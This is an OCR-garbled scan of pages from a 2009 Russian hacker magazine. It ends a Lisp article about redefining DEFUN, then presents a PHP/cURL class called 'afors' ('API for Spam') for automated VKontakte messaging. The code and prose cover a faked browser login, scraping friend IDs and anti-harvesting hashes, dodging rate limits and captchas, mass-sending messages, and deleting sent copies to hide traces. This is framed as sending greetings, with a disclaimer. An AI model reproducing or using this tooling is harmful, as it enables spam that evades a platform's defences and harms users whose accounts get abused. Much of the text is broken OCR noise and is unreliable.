чения NIL на значение, равное функциональному объекту, ; Переопределяем систе.мную функцию DEFUN, ис­ найдешь на нашем

соответствующему тол ько что определенной функции. пользуя ее старую версию в DEFUN-OLD пацанском диске.

4) [QUOTE FI- Возвращаетсимволопределеннойфунк­ (defmacro defun (пате args &body Ьody)

ции. Теперьдостаточноопределитьfactorial с помощью '{let (*this*)

макроса DEFUN-NEW, используя переменную *THIS* в теле (defun-old ,пате ,args ,@body)
фун кции, и добавлятьфункциональностьописанным выше {setq *this* (symbol-function' ,пате»)

способом. Я предлагаютебе провести зтот зкспер.имент , ,пате) )

лично и увидеть все своими глазами. Откровенноговоря, ;Проверка

чтобы решить задачу «добавлениефУНКЦИОI'lальностире­ (defun Е(х) (list х *this*)

курсивным функциям», применять новый способ определе­ (Р 5)

ния функций (через DEFUN-NEWI, учитывающий появле­ ; Восстанавливаем прежнее значение, если в но­

ние замыкаемой переменной *THI5' в теле функции, вовсе вой DEFUN больше нет необходимости

не обязательно.НО дело в том, что для пере~енной"ТН 15" (setf (rnacro-function 'defun)

есть и другое примеf1ение. Например, можно заставить (macr.o-function 'defun-pld))

фун кци ю ре гистрировать себя где- либо, используя для

зтого фун кционал
f1яемой в настоящий момеf1ТфУНКЦИИ. Заметь, что просто
зарегистрироватьсимвол
достаточно из-за возможности переназначения функцио­
нальных объектов. Я уверен, найдетсS1 Мf10жество способов
bf1bI й объе кт, соответствующи й вы пол­
имеf1И фУf1КЦИИ может быть не­
Ощути величие ситуации l Мы дополнили системный меха­
низм определениS1 f10BbIX функций своим собственным ко­
дом! Попробуй-ка проделать то же самое, например, с Си.
Дополни iпl mу_fuпсtiопkhаг argl, char arg2] С,} нужным
тебе функционалом. Если ты всерьез заду~ался над этим

применеНИS1'ТНI5', но вот для чего его применить не вопросом, - смотри незагреми в компанию к Наполеону с

получится, так зто дл~ добавлени~ фУНКЦИОf1альности к уже Македонским ;J.

созданным кем-то фУf1кциям 1 Либо из-за отсутствия исход­ На зтом примере мы стобой осознали одну важную вещь:

ников, либо из-за необходи~ости добавлять функциональ­

Лисп - это наш слуга, а не наоборот, как бываетобычно. И

ность в r'un-time.
это еще одна причина Бессмертия Лиспа.

Далее ~ покажу тебе, как обойтись без 'ТН 15' при до­

бавлении ФУНl:;циональности к уже готовым функциям, а

ЗАКЛЮЧIЕНИЕ
затем рассмотрю ситуацию, когда 'THIS" все-таки нужен,
Еслиты понял суть вышеописанного, и твой мозг не взор­
но создавать новый способ (макрос) определенияфункций
вался, - то можешь при желании вступать 8 секту и гордо

не хочется. называться "Лиспером» :1.

Вот код, который следует использоватьдля «апгрейда»уже к сожалению, много чего осталось за рамками статьи: и

готовых рекурсивныхфункцийIбез 'THIS*). оригинальный процесс разработки, не идущий ни в какое

сравнение по качеству с традиционным, и описание сбор­
; ;; добавление функциональностик уже ки автономных исполн~емых файлов lехе, еltl, и поднятие
," ГОТОВЫМ рекурсивным функциям программируемого дина~ического лисп-веб-сервера, и
;определение факториала без *THIS* рассказ олидерах сообщества, ихтворчестве И бесплат­
(defun factorial(x) ных библиотеках, и ... в общем, много чего хотелось бы еще
(if (zerop х) 1 (,. х (factoria1 (1- х»))) рассказать, но, ксожалению, статья не резиновая. Судя по
(setf (symbo1-function 'old-factorial) всему - То Ье сопtiпuеd. :JE

ХАКЕР 06 {1261 О.
 [23]­
>> ,:;.()d'r\,-;\
,~~
'"",,ЕR,,",П

"/~ ~
I _
ДЕНИС БОНДАРЕВ

I AST~RGANST~R"'GMAIL.COM I
" ­

'~
1+++
~.~ спдм 1.
++ . 'ТАЦЕНТР
АёПАtv1@ЕА
D~_ J-~ ~ ~ CS) l§§I
",','
, , " -

+++ />::/ I
1-++
ф
,:;, ID~~~ ~CS)~
[[][]
+++

СВЯЗЬ КЛИЕНТА
+++
•
ПОЧТОВЫЙ

СЕРВЕР

1+++

"
1+++
ТВОРЧЕСКИИ СПАМ
+++
ВКОНТАКТИКА
Сага о том, как программерырассылаютсвоим друзьям
'+++
поздравительныесообщения

+++ в наше просвещенноевремя нежелательнойкорреспонденцией

в социальныхсетях уже никого не удивишь: В одноглазникахи кон­

1+++ тактиках имеет аккаунты большая часть активного населения нашей

родины. Это же население представляетсобой вкусную пищу для рас­

1+++ сыльщиков - туттебе и ФИО, и возраст, и координаты в пространстве.

Есличеcrно, мы совсем не одобряем во всех ее проявлениях.Так что, вперед ких десятков сообщений в сутки пользова­

+++ сам факт существования спама: нас он - окунемся в мир противостояния спама телям, не являющимися твоими друзьями

раздражает совершеннотак же, как и и антиспама, капчи и человеческого (и то, если пользователь не запрещал
любого другого интернетчика, и нам так фактора, гения и злодейства, Моцарта и общую отсыл ку ему таких сообщениЙI.
же хочется поймать всех спамеров В один Сальери ... 2) Время между отправлением сообще­
,+++ большой котел, залить серной кислотой и ний контролируется - система просто 1·le

медленно кипятить на среднем огне. Так, КАПЧА _ даст отправить сообщение, не выдержав
стоп, я увлекся. Почему же мы решились И ЧЕЛОВЕЧЕСКИИ ФАКТОР определенный лимит между вызовами
на создание статьи со столь претенциоз­ «ВКонтакте» очень неплохо защищен от скриптов отправки [трех секунд достаточ­

+++ НЫМ названием? А как иначе? Специали­ спама. Защита эта, по сути, стандартна Hol. Сам понимаешь, реализация много­
стов по информационнойбезопасности для социальных сетей: поточности с авторизацией по одному
темная сторона силы должн,а интересовать 1) Невозможно отправить более несколь­ аккаунтустановится неуместна.

+++ ~ 102 XA~EP 06 1126/ 09

!-:':-:':=:-(f.. ~~-t!;.-J~,""~~,",,_-l~,~~~_~~~

~~Ъf~~~':::':~-'-""'"
§~f.s.\~, .._.
....._'...._."........-..-,.... -_._-,..-...,,- -­
...... КОДФ'УНКЦИИ
~:g~~~~~::~- .".
АВТОРiИ 3АIЦИ И LOGIN_COOK[)
1

§~;~~~Е~~~~~q:~:;:.§"@:~~~~~~;т;Ё;:"-::F.:--=~::.::,; _,_.
E;:,~~i~;;r.::­

ДИДЛОГБРАУЗЕРАИСЕРВЕРА КЛIАССА «AFOR5»

ВПРОЦЕССЕАВТОРИЗАЦИИ

3)Даже если пользователи входят в public $auch_cook; / / олределяем гтаблик- перемен,",ую

состав друзей, имеет место определен­

ный лимит в количестве отправленных

сообщений. ОН довольно большой и, если
все-таки превышен, то пользователю $ch=curl_init (); / /инициализируем сеанс CtJRL
предлагается пройти тест captcha. / / Настраиваем сеанс CURL
4) Два последовательныхличных сообще­ I! Подробнее смотрите висходниках
ния должны быть различны хотя бы на 1/ задаем целевой скрипт
один символ, Это ограничение всерьез curl_setopt($ch, CURLOPT_tJRL,
воспринимать не стоит. 'http://vkontakte.ru/login.php');
5) При авторизации после пяти неверных
попыток предстоит пройти тест captcha.
Это не дает орrанизовать самостоятель­ / / включаем получение заголовков

ную автоматическуюпроверку аккаунтов / / определяем тип браузера для МfJСКИРОВКИ

на валидность / / установим требование 60ззращения ответа сервера

Самыми желанными для спам-атак в со­ / / установим реферер

циальных сетях считаются именно лично / / за;сосим маскировочные cookies

адресованные или публичные настенные / / определяем заголовки (не все обязательны)

сообщения, Мол, пользователь прочтет /! разрешаем отправку РОSТ-данных

их с высокой степенью вероятности, и это // составляем и отпра6ляеи запрос

деЙСТ8ительнотак. Комментарии, при­ // заносии лришедший ответ в переме!-П'1"УЮ $аП5иеr

глашения В группы/предложениядружбы // закрываем сессию CURL

- все :но тоже активно используется

народными спамерами, но по эффектив­

ности они ниже. / / проверяем лришедший код на наЯВrЮСТЬ

Отсюда следует, что наиболее эффектив­ / / текста' captcha_sid'

ным подходом будет рассылка сообщений if (strpos ($anSWEI', 'captcha_sid') <>0)

«по друзьям», где серьезных ограничений

как таковых нет. Это значит, что спамеры, preg_match_all ( '#sid" : " ( . *7) "# " $answer, $sid..id) ;

добыв пароли и логины от аккаунтов поль­ /! возвращаем homep-id теста captcha

зователей (а их количество исчисляется r'eturn "sid_cap:". $sid_id[l] [О];

сотнями и тысячами 11, авторизируются

под каждым и организовывают рассылку else
сообщений по друзьям аккаунта-жертвы.
Исходя иэ тосо, что таких жертв сотни / / лроверяем при шедший код на ,..,аявность

или тысячи, а у каждой .~ довольно много // текста' Eailed'

друзей, количество которых все время if (scrpos($answer, 'failed')<>O)

возрастает, - это влечет за собой просто returТJ "Eailed"; // возвращаем 'Eailed'

осромные массы сообщений и самые EClse

негативные последствия ОТ спама! Опять

же. возникает вопрос: каким образом // парсим и ЗаНОС~'1 в чистом видеcookies

спамеры добывают эти самые аккаунты и // в переменную

$this->auth_cook

добывают их маСС080 - сотнями тысяч? ргеg_mаtсh_аll('#Sеt-сооkiе: (.*;)#tJiS',

Не могу не вспомнить слова великого $answeI', $answer) ;

Альберта Эйнштейна' «Только две вещи Eor($t=O;$t<count{$answer[O)) ;$t++)

бесконечны: вселенная и человеческая $auth_cook.=$answer[O] [$t);

глупость, и я не уверен по поводу пер­ preg_match ( '#remixmid= (. *7) ;#', $auttl_cook, $myid);

вой», И это 'гак :). Способы добычи аккаун­ $this->аuth_сооk=stг_rерlасе("Sеt-Сооkiе:",

тов классические - фишинговые сайты, " ", $auth_cook);

трояны, черви. // возвра аеи id залогиненного ПОПЕ,зователя

Однакохакерско-спамерскиеаспекты ~-eturn $myid[l];

массовых рассылок нас с тобой инте­

ресуют мало, Мы с тобой - социально­

активные личности, у нас много друзей. а

ХАКЕР 06 11261 09 • 103

..

 l8]~
» l2:::SJ
coding
l8]
+++

, __ iserw._IP!!t:oS!:t_~:!oJ

"" :t; IНП .....м

J,..,s.:.
21300"""," mKOHT~~~e_ _ ~. ~ 61<ОА : реГI'<:"ТР~Ц!o'I~ ; ПОflОЩЬ
о
,!i,j,P 1.. ~II.php M'lPil-~ I
Добро ao:м:rr... noaaTb
U~ ..r·A''NIt: IIDZ11_1oiI/~.(j ((o"!,~H~l.. :
Hast:
~~",.. ~t.;
"~~t~kt~ .....

.,.

ICS'," r.~; wi/l"o,,~ tп

~.'; .НН tLf1I 1.1_.\~:t~; .1'1[1 CL~ 2.~501~~)
""""
~
rr.:w... ,,,,,.

--
a"tl.. : n"'1"".I~""".: rl!'..1:oft.... u..-..-.\LIкI~Н.ru;
... fl\.i"ра~ ... ·~f-lI:)сс.сс_~~,) .. ,)"'6~'Ь~9.,~': r .... j"S'ill·b21;ofQF6""~OIl"lI)Jlo\)C70C' BICotrtakTII!.py-",~iIМ>Носсрr;q.СТ80~аз,нако-,
QfltL... t-~ ..... 'th: 32-\

опlN.t-l'р";оррlio:-lot:иn/"·_·'о,.
........ гlсnсQ(!еd
мы)lO'*,чТoбdlJl'n'>o".ОА~,а.vco<~сооеАНН~nп~шrА"ОСТllИl11tЬtll':ot1"t'/JI(П:.
~.J'f(Io<olo ~QW\O""fI)
~~ ~;~~~~ ';::1 ~j(h;Os8I·.\"~~2C1a 1C'02"'cl",In",R..bb'1'29t"P~!t"· 'oa'oDtos....d· Нo''f.*.~ :r37ЗО65'J,

I Sf'r~ .. r
D~r .. ~'ln. 19 н.у
~1

n!)J_",,/ •. f>
20119 21:~.~3 С'"~
BJCffT&kl'e-С~ПOCOJl.~сeWтDРОCl;l<loolIfУIф"'''"С,

I ~

CO/l~"/lt.-'YIМ': 1f~t/" ..I. с,,",Г~Н'lIiI'l<!U"'~-Ч~'

1"~1', -ЕМ:Оdih!l (1)111111.. 4

С~НCt'о(<lIНт"ВwIЮ!II~ТО:
t,,,.. ,,105"

Coron
~~"оUl:г.. о-"'J· PIiP/5., IHI· .. tcb13

~tI-Со.. kн· ,,,111,,1..,,,-, r"pl""S"IO/I, ,О ,.... ,-2011 2;[ N ~3 с'" p~t"wJ.

GO.... Jn~ .. k"nl~Ц~ 1'11 • НI!Iitr"IIC.аеIi,СО:DТ~bWtеыlWl'".~-IМбo~,~5от~М101j1.Ы),'~.
.i-'+++ I'r'~~ ... - ПО C~CfI.

C~~".-col>t ....1 ~tjI.,,~,~ 1.... ,t-... L·"~ljdtt~

.)/»t4lТl>боJlloШООAl(lДIQ,,,огарооеI!.s:CJI:%I)'II:dIOТ.Н~tc:IIIЫ:It~.
• 8cw"А"'о<Ты.'I'bC'I1t1l(aorI'М;;ТО~ТOIIII,IC'ТО&.AO;JOГ,
SH~C ..ukjf; ""N.kOk-~: '~rir~~·S'<!II. QI\I-~!J-:.!:CI't eS:17:23 СИ1; p~t1\'I:
dOl>.>lo·.uk.... likt~.!'U

--
IЗ~3~ Эtca."p&«I по СФП1' _ •• ~
'(n.. ""'rtpt> 01Ul.'fТoВllcuC'l'nOXnepen1<"ТlI6J,I'IН
~~~~~~ ~,~~~r:on~.gf'tt~u~~~~!~li~lUIIe('b~Jt' a'j;

ДИАЛОГ K.[IACCA С СЕРВЕРОМ «ВКОНТАКТЕ» ПРИ

.+++ УСПЕШНОИ ОТПРАВКЕ НАСТЕННОГО СООБЩЕНИЯ О'51ТО Tt)'.I"t>,'lJ:I<::I)IoXJ 6n0.'" ГlpJDl1ro:1 po!.<:МI<';;

/lМ'ОНТllOCТгClW06-ZJ:I09

ДРУГУ
ВИД СТРАНИЦЫ АВТОРИЗАЦИИ В СОЦИАЛЬНОЙ
СЕТИ
-'+++ у друзей - много ЛИЧНЫХ праЗДНИКОIJ. Поздравлять их вручную­
сущая пытка, позтому я предлагаю тебе написать скрипт, который
будет делать зто за нас.
Ниже я покажу. как написать подобный скрипт с использованием
Curl и РНР. Назвал я его банально: «API [ог Spam", а 8 дальней­

КОД ФУНК'ЦИИ
шем - просто «afors».

ШАГ1.

FR_REC() ИЗ КЛАССА ПОДХОД И ФУНКЦИОНАЛКЛАССААFОRS.

АВТОРИЗАЦИЯ

«AFO RS» дЛ Я Поскольку <,ВКонтакте» определяетавторизированногопользо­

ПОЛУЧЕН,ИЯ
вателя по cookies, нам необходимо их заполучить. Как известно,

-'+++ после введения логина с паролем и отправки их на опреде­

СПИIСКАДРУЗЕЙ
ленный скрипт, сервер возвращаетВсе cookies, необходимые
для беспроблемногоиспользования ресурса. Поскольку нам

АВТ'ОРИЗИ,РОВАННОГО
необходимо продублироватьPOST -запрос от браузера к скрипту

--+++ авторизации на сайте, мы его отснифаем. Техника ПрИМИТИ8на

- берем любой снифер [>1 рекомендую SmartSniff - http://www.

ПОЛЬЗОВАТЕЛЯ nirsoft.netl и смотрим через него диалог браузера с сервером
«ВКонтакте» прVt обращениVt к скрипту авторизации.
Как видно из отснифанныхданных. авторизация прошла

public $fr_siz; i / определяен паблик- переменную успешно, и cookies передались без проблем, Теперь давай в
public $fr_rnass; / / определяем паблик- переменную точности повторим этот механизм авторизации на сервере

«ВКонтакте», используя почти все заголовки в POST -запросе

.,+++ [в частности, ПрVtсвоим заголовку Ассерt-Епсоdiпg значение
idепtitу, чтобы опустить получение данных в сжатом виде]. Это
$ch=cur1_init (); / iннициализируем сеанс CUP,L тут необязательно. но другие web-pecypcbl могут быть очень
/ / Настраиваем сеанс CURL ПрИДVtрчивы к отсутствиютех или иных заголовков. Как реше­

-'+++ 1/ Подробнее (нотрите висходниках ние - наш запрос должен быть максимально похож на запрос.
/ I задаем целевой скрип'!' сформированный браузером. Ниже >1 буду поочередно описывать

cur1_setopt($ch, CURLOPT_URL,
основные функции из своего класса автоматической рас­

, http://pda. vkontakte. L'u/write' ) ;

сылки по «ВКонтакте» [позтому срочно открой сорцы с нашего
С'+++ OVO и наЧVtнай их осиливать под моим трепетным руковод­
ством). Возьмем следующую РНР-шную фУНКЦVtю: login_
/I Включаем ПОilучение заГQЛОВКОВ сооk($10giп,$раss,$сарtсhа_sid,$сарtсhа_kеу1.

/! определяем Ти.r1 6раузера для маскироьки СформированныеPOST -данные отправляются на СКрVtпт h1lJU'L
.-+ ++ 1;' установим требование воэвращений оггвета сервера vkОПlаktеЛJ/lоgiп.рhр. Представленная выше функция lоgiп_сооk(]
!;' заносии cookies принимает входящими пара метрами логин, пароль, id-номер

!I отправляеr~ запрос картинки captcha и разгаданный ключ captcha. соответственно

,1 / заносим пришеДllIИЙ ответ в переЫ.еНhУЮ $al1S 1tJer [последние часто ~Iеобяэательны, позтому могут содержать нулевые

.-+++ 1/ закрываем сессию ClJP.L значенияl. Результатом станет возвра щение состояния авториза ­
ции и занесеНVtе cookies в переменную класса $this.-7auth_cook. В
случае успешной авторизации функция возвращает id пользовате,

1/ паРСИi'·1 СllИСОК друзей и заНОСИJ."\1 их id ля и полученные cookles в переменную класса public $auth_cook.
.,+++ /I 8 tvU:1ССИВ Stl1is->IГ_InаSS t а ИХ КQпит.:естео в Если же авторизация не прошла - то возвращает ответ «failed» .
1/ переменн-ую
$this->fr_siz А если авторизация безуспешна В течеНVtе пяти попыток - воз­
preg_rnatch_a11 ( '#<option va1ue\=" ( [0-9] +) ">#UiS' , вращает код аутентификации [id] captcha. Например. такой: «sid_
$answer, $this->fL'_rnаss) ; сар'21361 0192404". Зная id, можно отловить само изображеНVtе кап­

.+++ $this->fr_siz=count ($this->fL·_rnаss[1]); чи 110 ссылке hllp :I/vkontakle. ru/captcha.php?s= 1&sid=21361 О 192404
и ввести дополнительны
ии ее параметрами номер аутентификации

captcha с разгаданным ключом на изображении.

.+++ ~104 ХДКЕР 0611261 09

 '7-­ .
~II'.'
'_01.", .11"•.•
=~;:::::'~ ":':~::~' •.' I<-f'•• i",~; 11<1' •••: .,.;.-... ; ' ", , .15' "' • • _._ ~)
rО1: I О"э in .рI>pМI1I'/1.1

:~:~~A~::~~.~:~~~~i./".e (nnpi.tiDI~; "Ш 1.11: 'IIinDII"IS кт 1: ."-1 tLlt ,_, Q]1i .МЕ'
ttR Z_II.'S''''H
=~~.:::::'::-:..--t....-il·...,....._ I : ......:!.f"".-O)<""~""........~ , ..-"';...,~-Qo.~.:, .....,
R~ftr...,.: l,ttp:II.. 1cont..... tt.r"/IC>J:ift.pllJl? ..·,

t""I .. I·'"",", .".·jl••I;"'.J.·....... ,.'_I-.~.d

C""ki.t: rtn:i,.1.:Jn,,·o; .-\.",,,.><<;1,..-,: "'!'n>:"'!fI""")'_ .. 1.а~l."d_t,,,1)~-(l; гl.".... ц:\О~'I'<I_t;,ir~-.

cont.nt-',p~; ~рр1ici.tillП/",-, ......... fог.... ·uгIО:nG<IО.d

~~-;~~";l:·;.:<АЦ ~ •.,._'QO>;<.....,.,.,.." •• ~"""' ............._'--,._...............-r~-:< ... ~'v..-._ ..-.-- .. -.•~.,.. .. ­

...--..'.,1_ .
.... , '_:-.,
Х~fltЧQ .. ~tl."d""fit"~ IIlll.и,t,lfll''IОl.''i'

.
""Ctpt: t..-.rt.Jhtnl. ;;oWl,iC;ot,;!.Dn/l<lt1,;q-•. 9 ..."pJi.... tl""'.htru.·"IO.l. 1~' /p~ • ..... .?.. /j'PtS'.
i ..... 9.. /S'~f. 1_9I.",II-",oitrwp. "'·;ч·8.'
.~."

·_~, ..." .•.

\Ottч:"Oo+Ut, ._.а
...
=i~·~,="'··I; ""'.~--.,...
..·..
..
...
. .·.: <'",m_.
.-.·f~
,:.~

1>

'-.,·l".~"_~ QI.; ""."/: _I.·._'_~.'"

il;l:U'pt-Li.ngшg":Uk·UА.LIk;q-е.'J'.n;q-II_8

~"рt-с:,.,,~t,:i:l-\l·'1~9-1.utf-l.tltF-t6
1Icc..·pt-(fltadlng: il)~fII1tll
Ca:r>fI<:ttialt; 1::<:~-"\iУII'. 'Е
. • :ч·8_1

I'r,"",,''''~
Н: o~rH,tl'. 9zi". <"""11:..". i".nl:it,. t~.a.iI"rs
.».'&:IH

~c._,.,:t"'i~
~ ..-,." ....M
t.ol•• tll;Ofl..:~

~:
o-.:
"'I'1 :.t. 1~"" 1nl 1~;~::К !аС; ,.., ...,: _.i... _t.t.~ ....
Сопtl'flt-lr.а.1I1=l"-er--€"ОО(lin,;оi1li"',
CDnl<:"t-L .. п,lh:1~

II'lIIOIi 1~tn1_1I'-i1<II'~il."'~-is5' '2'3_~и""'iг~.IIИII'·._lаэ:u1_.tt .. ""tt<iрt<tn..._5~(I.·3"~s~7ZЭiiI01оn.rAlI'tr.n. _I<:I"Y· tцr~1

( ••• "-- _-) (."""<-·/1-·) •....•.• 1 .....•• 1/.> 1
1(l1r/1.' ;ZQIOI
.~~~ ~:~~~~~. пr:--,;······:~tr«?
S""'e>r:n,i""/O.6.:J1
lIil": S"n. ,. н.>у ~." 1~:11J"11 СМ1
~ ::~::::--t~~;-.:~~~->{'toН"'Х ....
.1~ --oQ"')'.х_(II»( ....>

(tIo •. tafltof'ht-typto: t .. X1/ht1D1:lOblr""5.t-lfln6оllS-1~1

Cann'!'ttloll:c;la511'
~1?~~~-:i:,:::t~~~хМа.·~i~~;;~;~<.....ХА>
);;-Ро\On"".,-II,; I"RP/";.2' ...I· .. tthI3
.....-i:l ... ;n.-<-Кn..
l:.a.etI.-с"nU"оl:р ..i,...itll'.nasl-r""'ilitl.Jt'fo
:..~":"~;:~~.,Z~>~ ...
,<\. .:"",.-...~х'="><Л» ... Sft~CDl>li:il': "'lIIixAi~·:I'89"'91>: f'xpir..,·, ...i. :l'1·~y~Z". 114':$9:73 ею: p;at,,-/: oorмi"·."li:ont-il:tf'.ru
SIl'I·COD):I .. : .... n,j.xf'N11-t<:,SI_хJl!о:. . I''t.. IIEЦ!l.YU: "кpi~.$·T ... ~. 11-н..)-:?1I111 811:'>1:8(j 1:111: pJlth-J; (tDтчiП·.vl1DntJl"'t "

ДИАЛОГ КЛАССА С СЕРВЕРОМ «ВКОНТАК­

s .. I-Сооli:l .. : ,..lIIi"рJlss· .. ,LtIllс.3... _9!1J1... 9J1ы...... ""r>1r2'DJuз.. : .. xpJ ........- ... un. IJ9-ШJ~ZО11 11::1'&: ..... CКf: ..... Ih-/: OOAain· kllnt ... l<te ...."

SlI't-(:qDk;~' ~ .. i"::.i"~<t.. S~II!'O~17I"r.w..,.~1I1 . .77l1.f1.Ir~b\t111f1111o~OC1Io2n~~;.."f'i ..... ~~Frt. З.....,r-'D1n '~~З1~~ 1:1'1'1; p;,lh-/;; lI''"'"'''''_"k~nl,)oklfo_,,~

ТЕ» ПРИ УСПЕШНОЙ ОТПРАВКЕЛИЧНОГО

СDnt~lIt-l""gth; 12

СООБЩЕНИЯ ДРУГУ ДИАЛОГ КЛАССА С СЕРВЕРОМ«ВКОНТАКТЕ»ПРИ ПРОВЕДЕ­

НИИ УСПЕШНОЙАВТОРИЗАЦИИ

ШАГ2. ШАГз. _
ПОЛУЧЕНИЕСПИСКАДРУЗЕЙ ПРЕОДОЛЕНИЕ ТРУДНОСТЕИ
Теперь, когда мы заполучили cookies, авторизовав­ Чтобы отправить сообщение пользователю. ПРОС10
шись во «ВКонтакте», следующим большим делом знать его id в системе недостаточно. Продвинутые

будет получение списка специальных номеров - id программеры вконтактика ввели систему специ­

всех друзей пользователя в системе, по которым альных хешей, прикрепленных к каждому id участ­ t> dvd
далее можно будет отправлять сообщения. ника сети. ОсобенноСТЬэтой системы - для разных На дискеты найдешь:

Для этого в классе существует фун кция fr_ авторизированных пользователей хеши пользователя Denwerc версией
rec($cookiel, которая входящими данными при­ по одному 'd разные, а чтоб отправить сообщение, РНР 5.х.х и установ­
нимает cookies, полученные, например, функцией необходимо передать скрипту как id пользователй, так ленной библиотекой
login_cook[l. Она работает просто: парсит полученный и его хеши iих по двое ДЛА каждого idl. Они уникальны CurL; снифер сетевого
html-код от сервера, обратившись к скрипту по адре­ для каждого отправителй сообщения. Такой ход был трафика SmагtSпiff;
су [1 t t ~ :I/p d а. vko п ta k t е .ГLJ/I'Vri 1е: введен ДЛй затруднения сбора баз данных пользова­ класс "AforS" с при­
телей всей системы. Поскольку рассылать сообще­ мерами скриптов

ния мы будем по своим друзьям, нам необходимо автоматической

добыть их хеши по их же id. С зтой благородной целью рассылки по «ВКон­

«ЧТОБЫ ОТПРАВИТЬ мы используем функцию user_hashl$id,$cookieJ, в такте». Дтакже - не­

которой входящими параметрами являются соот­ большую инструкцию

СООБЩЕНИЕ ветственно: id пользователя, ДЛй которого необхо­ по демонстрации

димо найти хеш, и твои кукисы. Фун КЦИй обраща­ примеровliпfо.tхtl

ПОЛЬЗОВАТЕЛЮ, ПРОСТО ется к странице по адресу http://vkontakte.ru/mail. и справочник по

pllR?act~write&to;.$id,в котором переменная $id фУНКЦИАМ РНР!

ЗНАТЬ ЕГО ID В СИСТЕМЕ содержит номер id интересующего пользователя.

Дальше происходит парсинг по htm[-коду страницы и

НЕДОСТАТОЧНО. возвращение массива с искомыми хешами ДЛй поль­

зователя. Функция возвращает массив $chas, где в

ПРОДВИНУТЫЕ $chas[1] содержится специальный КОДДЛй параме­
тра chas, а в $chas[2] - код ДЛй параметра secure
ПРОГРАММЕРЫ Данные параметров chas и secure необходимы для
разрешения отправки сообщения пользователю, по t> warning
вкаНТАКТИКА id которого они были найдены, - и посылаются на Ты уже понял, что
скрипт http://vkontakte.ru/mail.php вместе с другими ПОД «спамом» мы

ВВЕЛИ СИСТЕМУ данными, понимаем рассыл­

Приводить здесь код этой функции, как и после­ ку поздравлений

СПЕЦИАЛЬНЫХХЕШЕЙ, дующих, думаю. необязательно. Все они похожи своим друзьйм? Мы
по строению на описанные в "Шаге 1" и "Шаге 2". не советуем тебе за­
ПРИКРЕПЛЕННЫХ К Отличаются лишь содержаниемзапросов и условий ниматься рассылкой

В регулярных выражениях парсинга В общем, кури "настойщего» спама

КАЖДОМУ ID УЧАСТНИКА диск и не несем никакой

ответствен ности за

СЕТИ». ШАГ 4. ФУНКЦИЯ 5END_ME550

противозаконное

КЛАССА«AFOR5»
использование пред­

Опираясь на предыдущие шаги, мы уже можем ставленной инфор­

Из комментариев видно, что результатом работы яв­ получить все необходимые параметры для отправ­ мации l
лйется заполнение паблик-переменных public $fr_siz ки сообщений друзьям. Для зтого В классе пред­
и public $fr_mass, в которых, соответственно,хранит­ назначена функция send_rness ($id, $cash,
сй количество друзей в численном виде и массив их $sec, $cookie,$titl,$rness, $captcha_sid,
id в системе [$fr_mass [1][$х] , где х - число от О до $captcha_.key) , Перечислим входйщие параметры:
$fr_siz.). id целевого пользователя; его параметр chas; его пара­

ХАКЕР 06 /126/ 07 ~ 105

 IZ :S.P
+++

+++
~
~ ~
1
i
метр secure; свои кукисы; тема сообщения; сам текст сообщения;
homep-id для captcha; разгаданный ключ для caplcha Iпоследние
<?
inc1,"de ("afors ,php'); (( !!одкnючаем кnасс

:+++ два могут содержать нулевые значения, если не нужныl. $m=new afors ( ) ; (/ создаем объект класса

Обращаясь к скрипту по адресу hltp:llvkontakte.ru/maiL.php, $mess= "I-1е110 Wor1d"; (.1 пишем текст сообщения 01
функция посылает ему сформированныйРО5Т-запрос из всех /.1 iТогинемся и получаем cooki es
необходимых и ранее добытых нами данных. $ш->lоgiп_сооk("10gin", "раss'лоrd" ,0,0);

+++ И возвращаетзначение 1 в случае успешной отправки, значе­

/ / присваиваем I"терененньй $cookies саt'4И cookies
ние О в случае неуспешной отправки или специальный id-номер
$cookies=$m->a,"th_cook;
аутентификации captcha в случае, если система потребовала
.1.1 вызываем функцию для ПQЛ'J"еl'iИЯ списка друзей

пройти тест captcha.

$m->fr_rec($cookies);
Как ты, наверняка, знаешь, после отсылки сообщение добавля­

ется в список отправленныхсообщений в аккаунте отправителя.

11
.1 /
попучаем массив хеmей ЛИУ:НОГО соос.ЩОН/rЯ ДПЯ

11-го друга в сrшСке друзей (Er_mas" [1] [10J)

. .
А зачем же нам разводитьлишний мусор и палево, если можно
$g=$m->user_ha"t! ($m->fr_шаss[1] [10] ,$cookies) ;

после отправки сообщения сразу же его опуда удалить? Для s1eep ( "5" ); .1 / делаеы задержку 13 5 секунд

зтого В классе существуетфункция cLean_onemess!$cookieJ , ко­ .1 (посыпаем сообщение другу

торая удаляет из списка отправленных последнее сообщение. Ее $rе=$ш->sепd_mеss($m->fr_mаss[l] [10] ,$g[1J,

входящим гrapaMeTpoM являются лишь cookies авторизирован­ $g[2], $cookies," Hello",$mess, "О", "О");

ного пользователя В системе. В случае успешного завершения sleep( "5"); // делаем задерю<:у в 5 секунд

она возвращаетзначение 1, иначе - О. / / очищаеы lюслеДI-:6е ТОЛЬКО ЧТО О'1'правпенное

.1 .1 сообщение со списка отпраел(шныУ. сообщений

ШАГ 5. ПРЕОДОЛЕВАЕМ ТРУДНОСТИ ПРИ ОТ­ $re2 = $m->c1ean_onemess ($cookies) ;

ПРАВ,КЕ НАСТЕННЫХ СООБЩЕНИИ .1 / выводим результаты функций send_mess ()

-+++ в завершающей части нашего стобой Марлезонского балета / /и сlеал_опеmеss ()

рассмотрим преодоление трудностей в процессе отправки со­ echo $1:·е. " : : •. $re2 ;

общений на стены друзей.

?>
Алгоритм очень схож с отправкой личных сообщений' сначала

-+++ парсим хеши стены для каждого друга, а затем - отправляем ЧТО такое? Всего 12 строчек весьма легкого, понятного и от­

сообщение. комментированного кода? Отлично' Тогда рассмотрим пример

Для добычи хешей используется функция user_wa11_hash ($id, отправки сообщения на стену друга:
$cooki е) , которая запрашивает страницу искомого пользователя

+++ по адресу http://vkontakte.ru/id.$id, где переменная $id содер­ <?

жит id интересующего пользователя. Тут входящими параметрами inc1ude (" afors .php"); (.1 подключае!" клзсс

являются Id пользователя [хеши стены которого надо добыты
и $m=new a.l'ors () ; // создаем объект класс;;

собственные cookies, соответственно.Функция возвращаетмассив $шеss= "Hello Wor1d" ; // пишем текст сообщения

.+++ $chas, где $chas!1] содержит специальный код-хеш стены для .1.1 логинемся и получаем cookies

параметра walL_hash, а $chas[21- специальный код для параметра $m->lоgiл_сооk( ., 10gin", " password ", "О", "О");

mld Для отсылки сообщения на стену необходимо воспользовать­ .1 / Г1рисваиваеи переменной $c:ookies сfu'1И c.:ookies

ся функцией send_wa11 ($wa11_hash,$mid,$cookie,$mess, $ $cookies=$m->auth_cook;

